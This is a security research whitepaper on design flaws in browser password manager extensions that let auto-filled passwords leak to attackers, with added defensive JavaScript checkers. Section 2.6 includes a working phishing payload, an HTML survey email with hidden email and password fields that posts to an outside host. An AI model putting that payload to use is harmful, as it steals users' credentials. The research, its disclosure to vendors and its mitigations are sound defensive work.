Marc Blanchou marc[at]isecpartners[dot]com
Paul Youn paul[at]isecpartners[dot]com
iSEC Partners, Inc
123 Mission Street, Suite 1020
San Francisco, CA 94105
https://www.isecpartners.com
November 13, 2013

Abstract

Advancements in password cracking and frequent theft of password databases endanger single-factor password authentication systems. Password managers are one of the only tools available that can help users remember unique high-entropy passwords, and other secrets such as credit card numbers, for a large number of applications. Can password managers deliver on their security promises, or do they introduce security vulnerabilities of their own? This paper examines popular browser-based password managers and presents common security flaws that could be exploited to remotely extract a user's password.

1 Introduction

People regularly use dozens, if not hundreds, of web applications. Savvy users know that the best security practice is to choose a unique and complex password for every web application. Passwords are chosen to resist both online and offline brute-force attacks, the latter occurring after a password database has been stolen. Offline attacks get better and better as password dictionaries are published [1] (and are used as baseline guesses against passwords) and computing power improves. [2] Even users who have a system for creating passwords that may be more difficult [3] to guess [4] will have trouble remembering the exact password for a web application that is only rarely used. The solution is some type of password management system. Password management systems range from the browser's integrated auto-fill functionality, to a spreadsheet of username/password pairs, to a memorized scheme for varying passwords between applications, to actual password management software. Password management software is becoming increasingly popular because of the usability and affordability of the products.
[1] http://www.theregister.co.uk/2010/01/21/lame_passwords_exposed_by_rockyou_hack/
[2] http://arstechnica.com/security/2013/03/how-i-became-a-password-cracker/
[3] http://xkcd.com/936/
[4] https://www.schneier.com/blog/archives/2007/01/choosing_secure.html
[5] http://media.blackhat.com/bh-eu-12/Belenko/bh-eu-12-Belenko-Password_Encryption-Slides.pdf

Previous research on password managers has focused on the cryptographic protection of the stored passwords themselves in particular environments such as mobile devices. [5] This research instead focuses on browser-specific integrations and on mechanisms for remotely compromising credentials. Four of the most popular password managers were examined: [6]

- LastPass Chrome and Firefox Add-On, version 2.0.20: https://lastpass.com/
- OneLastPass Chrome Extension, version 2.6.7: https://www.onelastpass.com/
- 1Password Chrome and Firefox Add-On, version 3.9.19: https://agilebits.com/
- MaskMe Chrome and Firefox Add-On, version 1.27.318: https://www.abine.com/maskme/

Password managers have a difficult goal: provide a password management system that is both easy to use and protects passwords from unauthorized parties. In the context of a web browser, password managers should make it easy to log into web applications, but also ensure that passwords are only submitted to the intended party. Making sure that passwords are only sent to the intended party is more complicated than it may seem. Password managers must answer difficult questions such as: Which login form is the correct one? When should the password be auto-filled? Is the password being submitted to the intended party? This research shows that most password managers made design decisions that greatly increase the chance of users unknowingly exposing their passwords through application-level flaws. Many of the flaws stem from browser-integrated password managers that do not follow the same-origin policy that is crucial to browser security.
In the case of password managers, this means that passwords can be filled into unintended credential forms, making password theft easier.

2 Vulnerabilities in Browser Integration

The most popular password managers have integrated browser extensions or plug-ins that can manage your passwords automatically. The extensions attempt to detect credential fields automatically and fill the detected forms with the appropriate password. If the integration is not performed properly, passwords can be filled into an attacker-controlled password form or siphoned off to unintended parties. We tested the password managers listed above to see whether they properly protect against the attacks described below.

2.1 HTTP vs HTTPS

Perhaps the worst type of vulnerability discovered was in the MaskMe password manager. MaskMe failed to distinguish between the HTTPS and HTTP schemes, violating the same-origin policy concept. That means that if MaskMe is configured to auto-fill a credential on an HTTPS origin such as https://www.google.com but encounters a login form on http://www.google.com, the form is still populated. A man-in-the-middle attacker, say on a public wireless network, could simply redirect victims to fake HTTP versions of popular websites carrying login forms and JavaScript that auto-submits them once MaskMe has filled them in. Anyone using MaskMe with auto-fill enabled (the default behavior) could very quickly have their passwords stolen simply by connecting to a malicious access point, and the victims would never know.

[6] All password managers discussed in this paper have been informed of the weaknesses discussed here and were given at least sixty days to address them prior to the publication of this whitepaper.

2.2 Cross-Origin Password Submission

Three of the browser-based password managers (LastPass, OneLastPass, and MaskMe) were found to submit passwords across origins.
In simple terms, that means that if a login form is encountered on https://www.google.com but sends the password to https://www.isecpartners.com, the password manager fills in the user's https://www.google.com credentials and sends them to https://www.isecpartners.com. If an attacker is able to create a login form on a victim website that directs credentials to a malicious web server or a compromised application, the attacker can steal a victim's password even when JavaScript cannot be inserted or executed. [7] Although creating a malicious login form on someone else's website seems difficult, it can often be done relatively trivially because of the additional weaknesses described in the following sections.

2.3 Subdomain Equivalence

OneLastPass, LastPass, MaskMe and 1Password ignored subdomains when comparing origins. That means that a login form encountered on https://forum.example.com is treated as equivalent to a login form encountered on https://example.com/log_in, violating the same-origin policy. [8] Subdomain equivalence is quite dangerous because some subdomains, such as user discussion forums, blogs, or mail subdomains, can often be manipulated by an attacker. For example, a forum that allows HTML-formatted comments could be exploited by an attacker to add a login form on the domain and thus steal credentials from unsuspecting users. In addition, an application with multiple subdomains is likely to have weaker ones that are vulnerable to Cross-Site Scripting (XSS), which effectively allows an attacker to retrieve credentials for the parent domain when the password is auto-filled into a fake login form.

2.4 Which Login Page?

None of the examined password managers appear to verify the login page for a remembered password on a given domain. For example, although Vimeo's login page is hosted at https://vimeo.com/log_in, all of the examined password managers will detect login forms anywhere on the https://vimeo.com/ domain.
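Sections 2.1 to 2.4 each describe one comparison the tested extensions got wrong. The following is an added example, written for this edit and not code from the paper or from any product it examines: a JavaScript autofill policy that makes those comparisons the way the browser's own same-origin policy would, next to a domain-only comparison that reproduces the observed behaviour. The shape of a saved entry ({ origin, path }), the function names, the pinPath option (which goes beyond what any tested manager does) and the page paths in the scenarios are assumptions for this example; the site URLs are the paper's own.

```javascript
// Added example, not code from the iSEC paper or from any product it tests.
// shouldAutofill() applies the same-origin checks of sections 2.1 to 2.4;
// weakShouldAutofill() is the domain-only comparison that matches the observed
// behaviour. Assumed for this example: a saved entry is { origin, path } as
// recorded when the password was stored, and the pinPath option enables the
// section 2.4 check.

// The tuple the browser same-origin policy compares: scheme, host and port.
// A relative form action resolves against the page it appears on.
function originOf(url, base) {
  return new URL(url, base).origin;
}

// Strict policy. Returns { fill, reason } so a caller can log skipped forms.
function shouldAutofill(pageUrl, formAction, saved, opts = {}) {
  const page = new URL(pageUrl);

  // 2.1 and 2.3: scheme and full hostname must match exactly. A form on
  // http://www.google.com or on https://forum.example.com is a different
  // origin from https://www.google.com or https://example.com.
  if (page.origin !== saved.origin) {
    return { fill: false, reason: `page origin ${page.origin} is not ${saved.origin}` };
  }

  // 2.2: the action attribute is where the password is actually sent.
  const actionOrigin = originOf(formAction, pageUrl);
  if (actionOrigin !== page.origin) {
    return { fill: false, reason: `form submits cross-origin to ${actionOrigin}` };
  }

  // 2.4: optionally refuse forms outside the page the password was saved on
  // (e.g. only /log_in on vimeo.com), a check neither the extensions nor the
  // built-in browser managers perform.
  if (opts.pinPath && page.pathname !== saved.path) {
    return { fill: false, reason: `form on ${page.pathname}, password saved on ${saved.path}` };
  }

  return { fill: true, reason: 'same origin, same-origin action' };
}

// Domain-only comparison reproducing the observed behaviour: scheme, subdomain
// and form action are all ignored, so every attack in section 2 succeeds.
function weakShouldAutofill(pageUrl, formAction, saved) {
  const registrable = (host) => host.split('.').slice(-2).join('.');
  return registrable(new URL(pageUrl).hostname) === registrable(new URL(saved.origin).hostname);
}

// Saved entries for the paper's example sites (paths assumed).
const GOOGLE = { origin: 'https://www.google.com', path: '/' };
const EXAMPLE = { origin: 'https://example.com', path: '/log_in' };
const VIMEO = { origin: 'https://vimeo.com', path: '/log_in' };

// Constructed scenarios: [label, page URL, form action, saved entry, options].
const SCENARIOS = [
  ['2.1 http downgrade', 'http://www.google.com/', '/signin', GOOGLE, {}],
  ['2.2 cross-origin action', 'https://www.google.com/', 'https://www.isecpartners.com', GOOGLE, {}],
  ['2.3 subdomain', 'https://forum.example.com/thread/1', '/post', EXAMPLE, {}],
  ['2.4 any page, path not pinned', 'https://vimeo.com/some/other/page', '/log_in', VIMEO, {}],
  ['2.4 any page, path pinned', 'https://vimeo.com/some/other/page', '/log_in', VIMEO, { pinPath: true }],
  ['legitimate login page', 'https://vimeo.com/log_in', '/log_in', VIMEO, { pinPath: true }],
];

// Evaluate every scenario under both policies.
function runScenarios() {
  return SCENARIOS.map(([label, pageUrl, action, saved, opts]) => ({
    label,
    strict: shouldAutofill(pageUrl, action, saved, opts).fill,
    weak: weakShouldAutofill(pageUrl, action, saved),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(runScenarios());
}
```

Run as a script, the table shows the weak policy filling in all six cases while the strict policy fills only the legitimate login page and, with path pinning off, the Vimeo form on an arbitrary page (the section 2.4 behaviour the paper notes is shared by the browsers' built-in managers). Comparing full origins also catches a non-default port, since the port is part of the origin.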
That means that if an attacker is able to inject a login form anywhere on the Vimeo domain, a victim's credentials could be stolen. [9]

2.5 Amplifying Risk: Auto-Fill and Auto-Submit

In order to make password managers even more usable, LastPass and MaskMe can be configured to auto-fill a user's credentials into any login form they encounter. LastPass also allows users to configure the manager to auto-submit credentials. Given the issues identified above, auto-fill and auto-submit functionality increase the risk of a victim leaking passwords, because an attacker can hide a login form inside a form the user expects to see. If the user submits the expected form, they are unaware that their password has also been filled into hidden form fields and submitted to the attacker.

[7] It should be noted that a script can retrieve and exfiltrate any data auto-filled on a page.
[8] Browsers treat these as separate origins and limit the interaction allowed between the two subdomains.
[9] This behavior is also true of the password managers built into modern browsers; see Section 2.7.

2.6 Putting It Together: Stealing Passwords

Because of subdomain equivalence, it would be relatively easy for an attacker to inject a phishing login form into any popular domain. In fact, many domains explicitly allow any user to create HTML content that is then rendered: for example, wiki pages, forums, and, perhaps most terrifying, most web-based email clients, which render arbitrary HTML-formatted email. We tested a phishing email containing a password field on three popular webmail providers: https://mail.live.com, https://mail.google.com, and https://mail.yahoo.com. The following proof of concept was sent as an HTML-formatted email:

    <html><body>Thanks for taking our Survey!
    <form action="https://www.isecpartners.com" method="post" style="font-size: medium; margin: 0px; font-family: Times; border: 0px; padding: 0px" target="_blank">
    Do you like cats? : <input type="text" name="cats"><br>
    Do you like dogs? : <input type="text" name="dogs"><br>
    <input type="email" name="Email" value="" style="max-height: 0px; padding: 0px; border-width: 0px; width: 0px">
    <input type="password" name="Passwd" style="max-height: 0px; padding: 0px; border-width: 0px; width: 0px">
    <input type="submit" name="signIn" value="Submit"></form></body></html>

Yahoo! Mail users running LastPass were the most vulnerable to credential theft. Any Yahoo! Mail user who has LastPass auto-login enabled for the yahoo.com domain and views email over HTTPS could have their username and password stolen just by opening the phishing email. When the email opens, LastPass automatically logs in and sends the credentials to https://www.isecpartners.com. If a user only has auto-fill enabled, the credentials are still stolen if the survey is submitted.

Gmail users are a bit better off, because Google warns you that a form is about to be submitted before fulfilling the request, even if LastPass auto-login is enabled. A Gmail victim would still be vulnerable if they actually respond to the survey with auto-fill enabled, or if they have auto-login enabled and click through the warning. Many victims will unwittingly submit their username and password to https://www.isecpartners.com. To give an idea of how successful such a phishing campaign may be, compare the two screenshots of survey emails sent to a Gmail address: [10]

[Screenshot: a legitimate survey email as rendered in Gmail]

The graphic above is a legitimate survey that anyone can create and send via email. Below is a malicious form that steals a person's password if they have LastPass with auto-fill enabled:

[Screenshot: the malicious survey email, styled like a Google Drive form, as rendered in Gmail]

[10] The pictured survey was customized to look like a standard Google Drive form and differs from the proof-of-concept HTML above.
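As an added example (not code from the paper, from any webmail provider, or from any password manager), the following JavaScript audits a form the way a mail client or password manager could before it lets credentials be filled: it resolves where each form submits relative to the page and flags credential inputs that inline CSS collapses to nothing, which is exactly how the proof-of-concept email above hides its Email and Passwd fields. The HTML is a copy of the proof of concept shown above; the page origin https://mail.yahoo.com, the benign comparison form, and the small regex-based parser (static HTML only, not a DOM) are assumptions for this example.

```javascript
// Added example, not code from the iSEC paper or from any webmail provider or
// password manager it discusses. auditForms() reports, per <form>, where it
// submits and which credential inputs the user cannot see. The page origin
// and BENIGN_LOGIN are constructed for this example; POC_EMAIL is a copy of
// the paper's proof-of-concept survey email.

const POC_EMAIL = `<html><body>Thanks for taking our Survey!
<form action="https://www.isecpartners.com" method="post" style="font-size: medium; margin: 0px; font-family: Times; border: 0px; padding: 0px" target="_blank">
Do you like cats? : <input type="text" name="cats"><br>
Do you like dogs? : <input type="text" name="dogs"><br>
<input type="email" name="Email" value="" style="max-height: 0px; padding: 0px; border-width: 0px; width: 0px">
<input type="password" name="Passwd" style="max-height: 0px; padding: 0px; border-width: 0px; width: 0px">
<input type="submit" name="signIn" value="Submit"></form></body></html>`;

// Constructed benign login form: same-origin action, visible fields.
const BENIGN_LOGIN = `<form action="/log_in" method="post">
<input type="email" name="email"><input type="password" name="password">
<input type="submit" value="Log in"></form>`;

// Attribute string of one tag -> { name: value } with lower-cased names.
function parseAttrs(attrString) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(attrString)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
  }
  return attrs;
}

// "width: 0px; display:none" -> { width: '0px', display: 'none' }
function parseStyle(style) {
  const props = {};
  for (const decl of (style || '').split(';')) {
    const i = decl.indexOf(':');
    if (i > 0) props[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
  }
  return props;
}

// True when the user cannot see the input: type=hidden, or inline CSS that
// collapses it. The proof of concept uses width and max-height of 0px.
function isVisuallyHidden(attrs) {
  if ((attrs.type || '').toLowerCase() === 'hidden') return true;
  const s = parseStyle(attrs.style);
  const zero = (v) => v !== undefined && /^0(px|em|%)?$/.test(v);
  return zero(s.width) || zero(s.height) || zero(s['max-height']) || zero(s['max-width'])
    || s.display === 'none' || s.visibility === 'hidden' || s.opacity === '0';
}

// Audit every form in `html` as rendered on `pageUrl`; one record per form.
function auditForms(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const results = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let f;
  while ((f = formRe.exec(html)) !== null) {
    const form = parseAttrs(f[1]);
    // An empty or relative action resolves against the page; an absolute one
    // may point anywhere, which is the cross-origin submission of section 2.2.
    const actionOrigin = new URL(form.action || '', pageUrl).origin;
    const inputs = Array.from(f[2].matchAll(/<input\b([^>]*)>/gi), (m) => parseAttrs(m[1]));
    const credentialInputs = inputs.filter((i) => ['password', 'email'].includes((i.type || 'text').toLowerCase()));
    const hidden = credentialInputs.filter(isVisuallyHidden).map((i) => i.name);
    const crossOrigin = actionOrigin !== pageOrigin;
    results.push({
      action: actionOrigin,
      crossOrigin,
      credentialFields: credentialInputs.map((i) => i.name),
      hiddenCredentialFields: hidden,
      // A manager that refuses to fill here defeats the survey phish even with auto-fill on.
      safeToFill: credentialInputs.length > 0 && !crossOrigin && hidden.length === 0,
    });
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditForms(POC_EMAIL, 'https://mail.yahoo.com/'));
  console.log(auditForms(BENIGN_LOGIN, 'https://vimeo.com/log_in'));
}
```

Run as a script, the proof-of-concept form is reported as submitting cross-origin to https://www.isecpartners.com with Email and Passwd as hidden credential fields, and the benign form as safe to fill. The crossOrigin check is the kind of mitigation the text credits to Outlook.com; the hidden-field check is the one a manager would need in addition, because a form injected on the same origin (sections 2.3 and 2.4) can still hide its credential inputs.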
Note that there is no obvious login form in the malicious screenshot, [11] but any victim who clicks Submit while using a password manager that auto-filled their credentials would send their username and password to https://isecpartners.com. [12] Outlook.com (https://mail.live.com) users were best off, because the mail application applies mitigations that block cross-origin form submissions of any kind, which prevents this attack.

2.7 How Password Manager Extensions Compare with Modern Browsers

We determined that the browsers' built-in auto-fill mechanisms were far more secure than the extensions tested. Both Firefox and Chrome respect the same-origin policy when filling passwords and do not auto-fill when the URI scheme (http/https) or the subdomain of the form target differs from the current page. In addition, the browsers refuse to auto-fill passwords when a login form submits to a domain different from the one it is displayed on. However, passwords are auto-filled on any page of a web application as long as it is within the same domain.

3 Native Application Flaws

Native application password managers can also be attacked just like any other software. We examined one such application: 1Password. 1Password performed automatic updates in an insecure manner by reaching out to an unprotected endpoint: http://updates.agilebits.com/check?.... If an update was discovered, the software was automatically installed using administrator privileges.

[11] The warning about submitting passwords is inserted by default into every Google Drive form and is unrelated to the described attack.
[12] Although Google does warn that a form is about to be submitted, the warning appears for any in-line form submission. For example, it appears when a Google Docs-based survey is filled out in an email. A user who expects to be submitting a survey about pets will likely click through the warning.
Because the update was performed over HTTP, a man-in-the-middle attacker could pose as the legitimate update server and serve the 1Password application an arbitrary piece of malware, which would be installed with administrator privileges and completely compromise the victim's machine. Note that AgileBits has reportedly patched this vulnerability.

4 Conclusions

Password managers can still be a huge asset to users when used properly. Unfortunately, it appears that many popular password managers are insecure by default, but there are simple actions users can take to use a password manager safely. There are also fairly simple improvements that password managers could introduce which would improve their security.

4.1 Recommendations for Users

Most of the tested password managers are designed to detect login credential forms. Although auto-fill and auto-login functionality can make password managers more user-friendly, those features greatly increase the risk of password theft using the techniques described above. iSEC highly recommends disabling any auto-fill or auto-submit functionality in password managers. Without auto-fill or auto-submit enabled, users have to indicate manually that a password form should be filled with the saved credentials, and a phishing attack such as the one described in Section 2.6 becomes much more difficult to mount.

Other general recommendations that are not specific to this research include:

- Use the password manager to generate a random password instead of picking one yourself, if possible. Random passwords are much more difficult to guess, and one of the benefits of a password manager is that you don't have to memorize them.
- Register a unique password for every site so that one password compromise will not affect others. Password managers are designed to make this easy.
- Only submit passwords on pages that are entirely HTTPS.
- Choose a strong master password to protect your individual passwords, since the password store could still be brute-forced offline if a device is stolen.

Although imperfect, a properly used password manager can still have a large positive impact on an individual's security.

4.2 Recommendations for Password Manager Software Developers

Password managers have some serious weaknesses that can make it easy for an attacker to remotely steal a user's password. Password managers configured to auto-fill login forms can be exploited through a simple survey-based phishing attack that the victim merely views in a web browser. The MaskMe password manager could be exploited directly with a simple network attack to harvest a large number of a victim's credentials at once. We highly recommend that password managers respect the same-origin policy concept, specifically with regard to subdomains and protocol scheme. Additionally, users should be given the option to configure cross-origin credential submission, and it should be disabled by default.